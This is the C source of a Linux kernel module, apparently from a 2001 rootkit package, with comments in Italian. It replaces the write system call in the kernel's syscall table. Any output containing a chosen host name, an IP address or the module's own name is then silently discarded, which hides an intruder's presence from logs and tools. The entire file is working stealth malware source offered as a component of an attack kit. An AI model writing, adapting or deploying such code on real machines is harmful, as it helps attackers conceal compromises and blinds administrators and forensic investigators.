/* File module.c from packet simbac.tar.gz */
/* By Tharkas / punkratio 2001             */

#define __KERNEL__
#define MODULE

#define MODULE_NAME "module"

#include <linux/kernel.h>
#include <linux/module.h>

#include <asm/unistd.h>

#include <sys/syscall.h>

#include <asm/uaccess.h>

extern void *sys_call_table[];

int (*old_write) (int, const void *, int);

char *HOST;
MODULE_PARM(HOST, "s");
char *IP;
MODULE_PARM(IP, "s");

int new_write(int fd, const void *buf, int count) {
int a = 0;

   /* NOTA: memcmp()  l'unica soluzione accettabile, perch se si usa una
       funzione dichiaratamente progettata per le stringhe, si rischia di
       combinare casini con alcuni programmi (compilatori su tutti) */

   for(a=0;a < count; a++) {
     if (memcmp(buf+a,HOST,strlen(HOST)) == 0)
        return count;
     if (memcmp(buf+a,IP,strlen(IP)) == 0)
        return count;
     if (memcmp(buf+a,MODULE_NAME,strlen(MODULE_NAME)) == 0)
        return count;
   }

  return old_write(fd,buf,count);
}

int init_module(void) {

 if ((HOST == NULL) || (IP == NULL))
  return -1;

/* Sostituisco i link alle funzioni nella sys_call_table ... */

old_write = sys_call_table[SYS_write];
sys_call_table[SYS_write] = new_write;

return 0;

}

void cleanup_module(void) {

/* E li ripristino. */

sys_call_table[SYS_write] = old_write;

return;

}
